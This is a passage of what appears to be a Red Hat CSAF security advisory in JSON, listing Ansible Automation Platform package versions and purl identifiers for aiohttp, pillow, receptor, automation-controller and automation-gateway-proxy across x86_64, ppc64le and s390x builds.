"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"product_id": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.6.17-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.6.17-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el9ap.x86_64",
"product": {
"name": "receptor-0:1.6.7-1.el9ap.x86_64",
"product_id": "receptor-0:1.6.7-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"product_id": "receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"product_id": "receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.6.31-1.el9ap.x86_64",
"product": {
"name": "automation-controller-0:4.6.31-1.el9ap.x86_64",
"product_id": "automation-controller-0:4.6.31-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.6.31-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.6.31-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"product": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"product_id": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debugsource@3.14.1-2.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"product": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"product_id": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debuginfo@3.14.1-2.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"product_id": "python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"product": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"product_id": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.3.0-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"product_id": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.3.0-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"product": {
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"product_id": "automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.5.10-7.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"product": {
"name": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"product_id": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.5.10-7.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"product_id": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.5.10-7.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.5.10-7.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el8ap.x86_64",
"product": {
"name": "receptor-0:1.6.7-1.el8ap.x86_64",
"product_id": "receptor-0:1.6.7-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"product_id": "receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"product_id": "receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.6.31-1.el8ap.x86_64",
"product": {
"name": "automation-controller-0:4.6.31-1.el8ap.x86_64",
"product_id": "automation-controller-0:4.6.31-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.6.31-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.6.31-1.el8ap?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"product": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"product_id": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debugsource@3.14.1-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"product": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"product_id": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debuginfo@3.14.1-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"product_id": "python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"product": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"product_id": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.3.0-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"product_id": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.3.0-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"product": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"product_id": "automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.17-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"product": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"product_id": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.6.17-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"product_id": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.6.17-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.6.17-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el9ap.ppc64le",
"product": {
"name": "receptor-0:1.6.7-1.el9ap.ppc64le",
"product_id": "receptor-0:1.6.7-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"product_id": "receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"product_id": "receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.6.31-1.el9ap.ppc64le",
"product": {
"name": "automation-controller-0:4.6.31-1.el9ap.ppc64le",
"product_id": "automation-controller-0:4.6.31-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.6.31-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.6.31-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"product": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"product_id": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debugsource@3.14.1-2.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"product": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"product_id": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debuginfo@3.14.1-2.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"product_id": "python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"product": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"product_id": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.3.0-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"product_id": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.3.0-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"product": {
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"product_id": "automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.5.10-7.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"product": {
"name": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"product_id": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.5.10-7.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"product_id": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.5.10-7.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.5.10-7.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el8ap.ppc64le",
"product": {
"name": "receptor-0:1.6.7-1.el8ap.ppc64le",
"product_id": "receptor-0:1.6.7-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"product_id": "receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"product_id": "receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.6.31-1.el8ap.ppc64le",
"product": {
"name": "automation-controller-0:4.6.31-1.el8ap.ppc64le",
"product_id": "automation-controller-0:4.6.31-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.6.31-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.6.31-1.el8ap?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"product": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"product_id": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debugsource@3.14.1-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"product": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"product_id": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debuginfo@3.14.1-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"product_id": "python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"product": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"product_id": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.3.0-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"product_id": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.3.0-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"product": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"product_id": "automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.17-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"product": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"product_id": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.6.17-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"product_id": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.6.17-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.6.17-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el9ap.s390x",
"product": {
"name": "receptor-0:1.6.7-1.el9ap.s390x",
"product_id": "receptor-0:1.6.7-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"product_id": "receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"product_id": "receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.6.31-1.el9ap.s390x",
"product": {
"name": "automation-controller-0:4.6.31-1.el9ap.s390x",
"product_id": "automation-controller-0:4.6.31-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.6.31-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.6.31-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"product": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"product_id": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debugsource@3.14.1-2.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"product": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"product_id": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debuginfo@3.14.1-2.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"product_id": "python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"product": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"product_id": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.3.0-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"product_id": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.3.0-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"product": {
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"product_id": "automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.5.10-7.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"product": {
"name": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"product_id": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.5.10-7.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"product_id": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"product_identification_helper": {
